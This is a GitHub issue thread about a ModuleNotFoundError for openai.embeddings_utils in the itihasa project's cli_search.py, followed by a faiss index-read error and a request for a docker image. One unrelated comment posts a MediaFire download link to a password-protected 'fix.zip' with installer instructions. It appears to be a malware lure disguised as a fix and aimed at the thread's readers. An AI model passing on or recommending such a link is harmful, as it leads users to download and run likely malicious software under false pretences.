### ISSUE TITLE
module not found error

### ISSUE THREAD

**Issue by shantanuo** [rahular/itihasa#4]
I tried the code found on this page...
https://github.com/rahular/itihasa/blob/gh-pages/cli_search.py

But got this error:
ModuleNotFoundError: No module named 'openai.embeddings_utils'

For this line:
from openai.embeddings_utils import get_embedding

Please update the code.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rahular** [comment]
Do you have the correct version of the `openai` as mentioned in `requirements.txt`? The `embedding_utils` module does not work on newer library versions.

**Comment by shantanuo** [comment]
I am now getting this error:
```
RuntimeError: Error in faiss::Index* faiss::read_index(faiss::IOReader*, int) at /project/faiss/faiss/impl/index_read.cpp:1027: Index type 0x73726576 ("vers") not recognized
```
Please provide docker image if possible. 

By the way your contributions are awesome!
